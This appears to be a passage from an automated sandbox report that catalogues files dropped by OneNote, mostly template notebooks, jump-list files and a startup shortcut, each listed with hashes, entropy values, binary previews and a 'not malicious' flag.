Entropy (8bit):	1.0410256069296682
Encrypted:	false
SSDEEP:	24:Y0MHYyfHnS4rt/ynlnlUzn1htnlnurnCCAS:rMHnHnS48d+7D1ds9
MD5:	D96FA96DBDC4D545801A916A604EA190
SHA1:	9FBF9139A43E5A103A3C50A65D14D4644905F851
SHA-256:	2FA7947098782CF8DA96B9C34B40D49DA163503D267D980A75DB36A06FDC86AC
SHA-512:	7E60A2DE4971ED1F802DE14508AE51D0C6D4BD85C4DA4187D133700C97427AEB42B7CE341B2EEDC99D02453FB84EA8D5C017C9564069038D60041EFB0AA66865
Malicious:	false
Preview:	./.C..vL....W"v_.<.b..EM.....CUs................?.....I..........................................................................Q...K.5...]..A.......................h............................................{d4k].@..Q~.`...........A2....H..U...N............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2321080345269602
Encrypted:	false
SSDEEP:	12:RazYyfiSHUXqFFBt2ELWn+J/C6c1uf4IUOXIxASDk1TWwlhOfPDYexnIB:YzYyfp08t1fgVIUOCAScSwlhpexe
MD5:	C87D5317C2D0D6518AEB7253134C315F
SHA1:	20CD4B7BCFA9F0E323232E9AFC80C1BF07998937
SHA-256:	1DB191107F46A3C046726E2F710C4994ACC638D4D355871DAA041904E1473940
SHA-512:	07DD417E84837B35DAFEB9E48F1213BB17FB4543D8B38596C8EBD67C82BD9B3CEDAAED76C1A4C3EB99CF153E734378D151D6518C9F3BEFC419B1B017E4CCD2BC
Malicious:	false
Preview:	./.C..vL....W"v_...Q...K.5...]..................?.....I.........................................................................G....B......].!wY....................h...........................................c.r.P&.H..{.e..r.........g...<"H.~.Z...,............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	1.5245299664287686
Encrypted:	false
SSDEEP:	24:YuYyf2/ljWVtR81IM5FgcjmjOCASu9wnSPckNfCRXVTHjS/jua:Zn2djWReIMbzjmXwlPNsljSz
MD5:	01C5D718730263BC1CB7164C6DD39E66
SHA1:	81227E50628B889402791A60624FCA161EAE51FE
SHA-256:	A716306EF216DC5044A4808AD18BE7A10D01287ADB2708182771A2DD2C2EFCD3
SHA-512:	0C3FBC558979D8170767FB7A56FE6A3C263AD38BED966EDE24E8DE85456B219B6CCAB80AC8627E0282404C1638C8718717AED70A1DAE4E1A626B7463646A85A6
Malicious:	false
Preview:	./.C..vL....W"v_..G....B......]................?.....I.......................................................................!......J..........H.....................h...........................`..................%..DD.F.b.o...........:.B..C.Q..z.5z............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.037789736978574
Encrypted:	false
SSDEEP:	12:RaC7mYyfHjhRhUnSBZaFFBtOS8p/+W6/QH/DoH/KTkVDXIxAS:Y5YyfH9cSBZctOSq/+U/Di/W4CAS
MD5:	B0CF71E8B9CD88B2BAECB86E18E2361C
SHA1:	15BB5AF3BE8054E98ADE5BF9FFC3D221AA379B02
SHA-256:	6D19D0F8E80162528D392EF1CA8FCBE50625FF21FC7474D6E8D4697874017EC7
SHA-512:	C9428AE664164CB669550206D5904023BC6E4CF89463059F364FEE20B3723F456CB8DFBCD158CD9B305E40510055AA04D456FAE75695C08610E8D5920E4B3D9B
Malicious:	false
Preview:	./.C..vL....W"v_....,.K...B..k................?.....I.......................................................................\|'....J..1.7.6HA.......................h............................................P.=Q@.A.......K..............E.1...ID.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2308610495678032
Encrypted:	false
SSDEEP:	24:YSYyfpMyGVtheBVMf/hXGeZMiUCAScVtlEpoFe:VnpMyqe2BXGtiAtCx
MD5:	AF787ABCA1226ADD1CBDCAA81BB11517
SHA1:	AA63504B9F6B65C4650A67B090DA4739884529F0
SHA-256:	59792C317FE212F178C9B85FD61BC87619B6B1AC34FFAE40B78C2C8FE9E7734F
SHA-512:	7EB5347B7BD795E856646A006E60FCF77771067600D217D7FDBA819DD694A999FEF7D35EFAEE13BFDAAAE7CE4A92438B7964EE48FD4E04EA45ABD194C27F2E4B
Malicious:	false
Preview:	./.C..vL....W"v_\|'....J..1.7.6H................?.....I.........................................................................G....B......]...}....................h...........................................Z.._.)A....i.P..........fBO..D......U.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0293462450165092
Encrypted:	false
SSDEEP:	24:Y5YyfHebS/WWtwXaMtaF7aMXJaRbgojCCAS:6nHebS/WJHI7VJ1a79
MD5:	4F61A6F6F64B3D7D2E0ADA388C2168DB
SHA1:	107E9C881A5963B241DFD1FED9AF7EA21DDC394D
SHA-256:	452CA23E5C141E7D10E18CA6D7C9FB1959D2FD7F3207418CC2AA5A38EB3E8E59
SHA-512:	9A8EA34F9E74FAF919129F9945260A410759112B1B4EBD1973E605014FEC8F69A36DCA5D70E086C9D11B98BD7BED20F2BE405E71531AEC62D826B9D5DD61EBFA
Malicious:	false
Preview:	./.C..vL....W"v_w.....G....LM..................?.....I.........................................................................G....B......]F..6....................h............................................z....J..j...5...........t..0C.-...p..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.041425211156165
Encrypted:	false
SSDEEP:	12:RaOYyfHjZk4hUnSvxFFBtRMKW6/I/A51oLXIxAS:YOYyfHl6Szt9Ki1oLCAS
MD5:	7BD4C8FA9F35CBED2F4714DA4D56B352
SHA1:	A4B13A8425ED8368DAF6893C5A5311D14D1017BC
SHA-256:	4C3A8248C65EAFD0D9A37E7BAC3F70D96C85E0D3BECE57351C255C20F0852DC0
SHA-512:	24809E8DF0A97A8F7CC17BAF20AB3AB576EBA47A21EA13D40B2545688511E2273E1AE72A88A623465C3BC58E2C80C6D12928A33FFD227F7024B64FC985245E5D
Malicious:	false
Preview:	./.C..vL....W"v_.5.b...D........................?.....I........................................................................<.%.O.A....f.A.......................h...........................................=.C..UvF.....=.............T..UD.D.%{-.a............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.23414236740739
Encrypted:	false
SSDEEP:	24:YIFFYyfp/l65gOFtRBVnfg+YKwd+CAScItlpe7Qe:jDnp/lR434pKgfmZ
MD5:	AB2D46F9FB31FF8C77B2F929DB4F5AE4
SHA1:	0072E5B095D51B5C00C26A32FA539EC9F2C4FACC
SHA-256:	2A0678101D40792ED3D211EE8B801C38A990C70E92CBCE05695657A183FBDDB8
SHA-512:	8738604D79371C6E3D4272CDFA7197D096C84D0C6E04B14B5E65ECE207D58E126CD8CCC85248DE531C039E25F247876645886C52A285E264E1C8DC13A77CC99A
Malicious:	false
Preview:	./.C..vL....W"v_.<.%.O.A....f.................?.....I.........................................................................G....B......].......................h............................................pgm...@..r..j............^R.r.@.p....og............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6208
Entropy (8bit):	1.305739090358942
Encrypted:	false
SSDEEP:	12:RaS9FYyfiepNUXeXMFFBttwp2WUJ/qTlXuf6ML6DXIxASntf14td1HUasgT19Cga:Y2FYyfh6ZttwQulXcraCAStde0bW1gn
MD5:	35A857F5257F628A521486AF45A02690
SHA1:	625A409DDED1DB7B70459438DF92FFE1FA7D62B8
SHA-256:	B63D6944DA4622F3AD584D619F74F58FF0D209982238CACCBC3450E8D0383085
SHA-512:	72B455964FB0BF8A8DAA14C6BC3C8B11DE5FC20DD5FF17B7C88305660890FCE2865F58F09DB3ECB89E36F95F974DA62352489F2003AD992F631983EAB13DA242
Malicious:	false
Preview:	./.C..vL....W"v_!......J........................?.....I.......................................................................j.y..].E..m2...R.......................h...........................@...............P....@...i.I.u........+......A..v>.fA.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0397219273570457
Encrypted:	false
SSDEEP:	12:Ra0jYyfHjN6ThUnSTioFFBt4DkEeVW6/ee+Ge7pGwXlpjMl8XIxAS:Y0jYyfHxLSVt4DIV7+R7QqlpIOCAS
MD5:	10B3B4A89BE7CAEDD661ADA440DA3219
SHA1:	7BEC8D0E9F50577B20FD42153D51FC9669AE4D44
SHA-256:	7690F86863001063086E332326B6A75F7BA90A03A41F27387028137145F959CC
SHA-512:	EF8788917B48ACD51FEB2FFFBC566CF5EBA24D09EC6EFE91265FA7BF38B7B990C50D2905519FB53F6FA128F3452AF4AFE24854C94936D1071D59C4168BF8B473
Malicious:	false
Preview:	./.C..vL....W"v_...\. .D.....{.................?.....I...........................................................................*..@..!w.J..A.......................h...............................................a..H.g.1.yb!........0.....C....................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2332490542767136
Encrypted:	false
SSDEEP:	24:YtYyftJevtI2foDgsLojCdX1CAScYlzLxuuuZ+e:antJea2IgT3HuRZ
MD5:	C97D6A086FD35433A6AE2EDB97C3CB85
SHA1:	327EE0F6FD67C3D4ABC0125E51825C1EBBA6628D
SHA-256:	DE29C57BD4E60E553BD1EB4EC2330E4D039F669A0AD785C8F4EC1841E5CA7AF3
SHA-512:	B491C35994C0CAE9F452D97C84181DAA52C77DAFF6AA83149210D28570A32E4FB7E128D396EFB60599D55C86F206C2A1D59217E041BDBFFAFDCC25604C6A1B92
Malicious:	false
Preview:	./.C..vL....W"v_....*..@..!w.J..................?.....I............................................................................a@..H.N....!wY....................h...........................................\../<x.C..D,{...........H.{.c.tN....{X&B............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	1.5199190927814858
Encrypted:	false
SSDEEP:	24:YVYyf2iurtnA458rWAXBWnCASuUnSkkNfCTX5X5Tr4Rng1ua:2n2iuyyMlXBjENGJ+RW
MD5:	889667990FAC6C303327504CBCAA4152
SHA1:	D258E373F8C69D7FEDDC4DF81EC4F0283F5134CA
SHA-256:	DB8E13794E8D983121EF62A47C5F4A7917157ABF5266CF5EE959C50E0D0458E2
SHA-512:	F68D4EE1A3531810BEF2EF1553E7B99C22383C407245AB8D383C4B690C92AB2F3C48456F6B26D84E9B5B25920FE97302CADF8472947F2A7056F084A4FC5DC2D4
Malicious:	false
Preview:	./.C..vL....W"v_.....a@..H.N...................?.....I.......................................................................!......J.........Eg.....................h...........................`.................m3N..N.^..}Q.q........J.]H.#6N.b@.?F..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0402158438780742
Encrypted:	false
SSDEEP:	12:Raaeg7YyfHjOqRhUnSLBRFFBtD1W6/nBxoSk+ptaXIxAS:Ydg7YyfHMSxtD1VBx3oCAS
MD5:	E72AC16EFD708953B66DAF3A5481485C
SHA1:	02328A78CF23A61D2D99FD9245BD14C3B17B2538
SHA-256:	9C2BB1393D3F0F6724AE2E9277602BE4F9C27AC68FE836B6DFF2F2FA6372796A
SHA-512:	8F62762F84FFE891A390D0A427BA09700FC637FB6C7BE379FF8C79821050B989E172FB995AA12DF44E011EE703D4BF737A146F30A4AAD8C1360027EA00CE1DEE
Malicious:	false
Preview:	./.C..vL....W"v_..@A..E.*.....................?.....I.......................................................................m.....MK.QcL~v}.A.......................h.................................................eM.}Tw.4.................E.]..s.=............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2342616223238896
Encrypted:	false
SSDEEP:	24:YWbYyfRXtRfQm1lixUCAScUgUlHZvlrI6e:zbnRbImu91IP
MD5:	0CC925E97A731366D8FADBE7CBAAFE40
SHA1:	076B3A19583E8CC94582C8F48EAA068857D9E4C3
SHA-256:	80FDEEC31386C34ED6033FCE0AC6530DEF96397376B3DFB62FB3A8C197EFBEFF
SHA-512:	317E0611524C17830B4FEDF5CCEF834B61AF7B01CCE3E6B0E4FDD285A3F60D55CFD99A3B15AA0541723B41FB53D33761617BE3048EB5CAF91D7793878F1071B8
Malicious:	false
Preview:	./.C..vL....W"v_m.....MK.QcL~v}.................?.....I............................................................................a@..H.N......}....................h................................................q.F...=..............l..vA......l.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0351931396377851
Encrypted:	false
SSDEEP:	12:RaUUYyfHjcCQUnSuZNaFFBt0YXW6/qTomU5biIEWXIxAS:YUUYyfHvrSuZNct08HL5GBWCAS
MD5:	55DE5428CC7B40B54A4C1F9A0EAAFB7E
SHA1:	059675A591D689D880412FEE04600BC81A497FA8
SHA-256:	DA67501D0E149BB90910F9811796417A29EE5F3A4CFDAD65E5418B9695F1A1E6
SHA-512:	BEF8674989380AA785BA889192771A9680ABB4F36C82DEA0E257EC3F89FD35417580C1C535FAA385FD1387406931BB356065A7A91B1238BB1F0A7E895E0581F1
Malicious:	false
Preview:	./.C..vL....W"v_...k.4E.T-?.{.................?.....I............................................................................a@..H.N...F..6....................h...........................................P+.(8..G.t.O.............\|b...O.}F.V.F.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0377461027498964
Encrypted:	false
SSDEEP:	12:RaizYyfHj37hUnSqdx4iyFFBthPMYFPMGW6/OPMr2PM2enKXXIxAS:YcYyfHmSqdatZMoMGOMroMBMCAS
MD5:	AAB220798C543EFBB4A8CD93455DC9FA
SHA1:	606EADBA9FD4015AF91C5AB551AAAB195B2DBE6E
SHA-256:	9DA620DAF614EEF175EA798B5882C0BF386ADEC84231BE42B8F18A285EDE1BC8
SHA-512:	0D297E5400E5296D62FDBC3A78F9362A819CA54857C8B1409DA5771ED7231BE4B068E7C7584986FC2C811B089647BC972E5BCF6EFF69CD9C885A8D48D5BCAC0E
Malicious:	false
Preview:	./.C..vL....W"v_MA.N...D.@..>.5.................?.....I.........................................................................b?.d+C.h..m..A.......................h...........................................(.Y....H.6...mx:.........*`....@....'...............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2272882870236337
Encrypted:	false
SSDEEP:	24:YYPYyfulqDJp1twOfxXUKHzCASc+la3g8e:9nulrOpXkF8wN
MD5:	A7A2E7D29B21B1D51FDA4D5C16A138A9
SHA1:	838E5B627E9F5A5537E006163BE74D304069D044
SHA-256:	6931DC5EB83CB1F95B5DFC2D4F10CF73D510B9AF4410659673D1C818650A286A
SHA-512:	F0BF089B4E26B5A205092E52DFA96A250B81EED7623EA08603FE2215F08D7C58D471A7E49BA1F35887BC07897B778A77509AD535C53A0C3FCB0642169676623C
Malicious:	false
Preview:	./.C..vL....W"v_..b?.d+C.h..m..................?.....I............................................................................a@..H.N..........................h..................................................G.q...4...........(...4<L.`..Z..^............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2280343232217326
Encrypted:	false
SSDEEP:	12:RaIjYyfiNiP/UXjPpFFBtRWn+J/iS3Hs8XIxASDk1mQCx3HRd+EAJp+jnIB:Y0YyfYKcbDtRf531CAScDCx3LCJie
MD5:	444973AC898E9260256AA36DC31404F3
SHA1:	0F78C59BDAFB51DE5117ACAFAE09DAE9ADC89296
SHA-256:	02711C9EEF3CE46E5362E84758465B5E120DFA57886FD6F0DBBA01C47A403ADA
SHA-512:	423C19163D5E6F183A63CD11125CECAD090F11345A66A9E5E2BD5F050421DAED9B1162F3037EA55EDC78B06496145FE980974E4818A734E2F035DA02C32B5E8A
Malicious:	false
Preview:	./.C..vL....W"v_j.y..].E..m2...R................?.....I.........................................................................U..gJD...u.......7....................h............................................Q..FS2F..*9v..y........q...#.G...4.u.;............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6168
Entropy (8bit):	1.2205155940569945
Encrypted:	false
SSDEEP:	24:YvYyf1+UktuFRF+fbFD5FH++1CASPqvVHdtp:sn1ely+gatbp
MD5:	F07B5551CE856F3F979C4B0887169FE6
SHA1:	D398584CE79A694951B7BDACD6E8126361149A36
SHA-256:	EF1CE1148167766B0C88EEEA74C4FD83CD8A36AD284E3ED386CD81C2C120DB5A
SHA-512:	73AE36D5014B4656CFD5253B32462D9427AF9958A9F057227767A62A098FCC1AC3B154ED4E6E3AE8D22BD2BBF54853326F51B602C498EDBB6EBF07DFF0BC2922
Malicious:	false
Preview:	./.C..vL....W"v_..U..gJD...u....................?.....I...............................................................................................................h...........................................f.4.W@L..+o...Y........A$.=..\A.?K0................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	3.5424962703557803
Encrypted:	false
SSDEEP:	48:LvsdVfJ1eCCfMdN5DMJC5ojd4WdVfJ1eBU/ckydNZGcG7CZR2//gA:LGfJyWMFe4fJn59j//
MD5:	0734C749B32F19E1DC3D0DEE9295B0F4
SHA1:	EF6DED4D77708EA2A2A1086E628D899EB40364A1
SHA-256:	8FB2369CFDC0A7F336269855B2A11F071E97181C28E572B3A7870B92AAE1E9D4
SHA-512:	E49F6AF3454364DB50A05B12CB62EF7D1AA4321C6FA2264DDFA0C8A969EE6C928D0C6FBFD040A4ECAE323D7D5576479013CA6714D240A9AD02418034274ECC37
Malicious:	false
Preview:	...................................FL..................F.@.. ...../.........!;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGVD......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.SGV......y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......."....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV.......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms~RF33a521.TMP (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	3.5424962703557803
Encrypted:	false
SSDEEP:	48:LvsdVfJ1eCCfMdN5DMJC5ojd4WdVfJ1eBU/ckydNZGcG7CZR2//gA:LGfJyWMFe4fJn59j//
MD5:	0734C749B32F19E1DC3D0DEE9295B0F4
SHA1:	EF6DED4D77708EA2A2A1086E628D899EB40364A1
SHA-256:	8FB2369CFDC0A7F336269855B2A11F071E97181C28E572B3A7870B92AAE1E9D4
SHA-512:	E49F6AF3454364DB50A05B12CB62EF7D1AA4321C6FA2264DDFA0C8A969EE6C928D0C6FBFD040A4ECAE323D7D5576479013CA6714D240A9AD02418034274ECC37
Malicious:	false
Preview:	...................................FL..................F.@.. ...../.........!;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGVD......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.SGV......y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......."....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV.......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J28P3KPVQHINSX3VNNMO.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	3.5424962703557803
Encrypted:	false
SSDEEP:	48:LvsdVfJ1eCCfMdN5DMJC5ojd4WdVfJ1eBU/ckydNZGcG7CZR2//gA:LGfJyWMFe4fJn59j//
MD5:	0734C749B32F19E1DC3D0DEE9295B0F4
SHA1:	EF6DED4D77708EA2A2A1086E628D899EB40364A1
SHA-256:	8FB2369CFDC0A7F336269855B2A11F071E97181C28E572B3A7870B92AAE1E9D4
SHA-512:	E49F6AF3454364DB50A05B12CB62EF7D1AA4321C6FA2264DDFA0C8A969EE6C928D0C6FBFD040A4ECAE323D7D5576479013CA6714D240A9AD02418034274ECC37
Malicious:	false
Preview:	...................................FL..................F.@.. ...../.........!;..../.....H]$...................../....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGVD......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.SGV......y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......."....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....b.2.H]$.6S.S .ONENOTE.EXE.H......6S.SGV.......!.....................p..O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .A.l.t. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JK4PDCTBXMJK198DMZ9I.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) \253\373\277\272, sparse, rows 1, columns 0, imaginary
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.163890986728065
Encrypted:	false
SSDEEP:	3:/lklT8OFf:CT8Ol
MD5:	4FCB2A3EE025E4A10D21E1B154873FE2
SHA1:	57658E2FA594B7D0B99D02E041D0F3418E58856B
SHA-256:	90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
SHA-512:	4E85D48DB8C0EE5C4DD4149AB01D33E4224456C3F3E3B0101544A5CA87A0D74B3CCD8C0509650008E2ABED65EFD1E140B1E65AE5215AB32DE6F6A49C9D3EC3FF
Malicious:	false
Preview:	........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, Sparse, ctime=Wed Sep 22 09:27:59 2021, mtime=Tue Feb 7 17:26:25 2023, atime=Wed Sep 22 09:27:59 2021, length=180528, window=hide
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	4.627783720613269
Encrypted:	false
SSDEEP:	24:8HxvdVKuJuNMNhKECBQ8AM+cFUKdNZhxoJl3G0GLJTvm:8HVdVfJ1eBU/cF5dNZq2/lTv
MD5:	14BD778349B4096CCA7134B24D93C3D1
SHA1:	040CB933CB454DFD8A4F9AE9F3226EFD4D899B29
SHA-256:	462D541464B1EE2A3E0FE51B4FCC86A51789F94445667B00CDDFBB0EB62914E8
